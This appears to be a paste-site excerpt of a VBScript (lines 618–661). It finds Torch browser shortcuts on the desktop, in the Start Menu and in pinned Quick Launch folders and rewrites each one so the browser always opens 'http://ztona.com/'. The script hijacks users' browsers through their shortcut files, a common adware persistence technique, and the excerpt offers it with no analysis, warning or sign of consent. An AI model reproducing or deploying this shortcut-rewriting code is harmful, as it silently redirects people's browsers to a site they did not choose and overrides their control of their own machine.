  618. shortcut.TargetPath = ExePath59
  619. shortcut.Arguments = ShortCutArg59
  620. shortcut.Save
  621. end if
  622.  
  623. shortcutpath60 = "C:\Users\Public\Desktop\Torch.lnk"
  624. ExePath60 = "C:\Users\Ahmed\AppData\Local\Torch\Application\torch.exe"
  625. ShortCutArg60 ="http://ztona.com/"
  626. If Fso.FileExists(ShortcutPath60) then
  627. Set shortcut = wshell.CreateShortcut(shortcutpath60)
  628. shortcut.TargetPath = ExePath60
  629. shortcut.Arguments = ShortCutArg60
  630. shortcut.Save
  631. end if
  632.  
  633. shortcutpath61 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Torch.lnk"
  634. ExePath61 = "C:\Users\Ahmed\AppData\Local\Torch\Application\torch.exe"
  635. ShortCutArg61 ="http://ztona.com/"
  636. If Fso.FileExists(ShortcutPath61) then
  637. Set shortcut = wshell.CreateShortcut(shortcutpath61)
  638. shortcut.TargetPath = ExePath61
  639. shortcut.Arguments = ShortCutArg61
  640. shortcut.Save
  641. end if
  642.  
  643. shortcutpath61 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Torch.lnk"
  644. ExePath61 = "C:\Users\Ahmed\AppData\Local\Torch\Application\torch.exe"
  645. ShortCutArg61 ="http://ztona.com/"
  646. If Fso.FileExists(ShortcutPath61) then
  647. Set shortcut = wshell.CreateShortcut(shortcutpath61)
  648. shortcut.TargetPath = ExePath61
  649. shortcut.Arguments = ShortCutArg61
  650. shortcut.Save
  651. end if
  652.  
  653. shortcutpath62 = userProfilePath & "\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Torch.lnk"
  654. ExePath62 = "C:\Users\Ahmed\AppData\Local\Torch\Application\torch.exe"
  655. ShortCutArg62 ="http://ztona.com/"
  656. If Fso.FileExists(ShortcutPath62) then
  657. Set shortcut = wshell.CreateShortcut(shortcutpath62)
  658. shortcut.TargetPath = ExePath62
  659. shortcut.Arguments = ShortCutArg62
  660. shortcut.Save
  661. end if
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement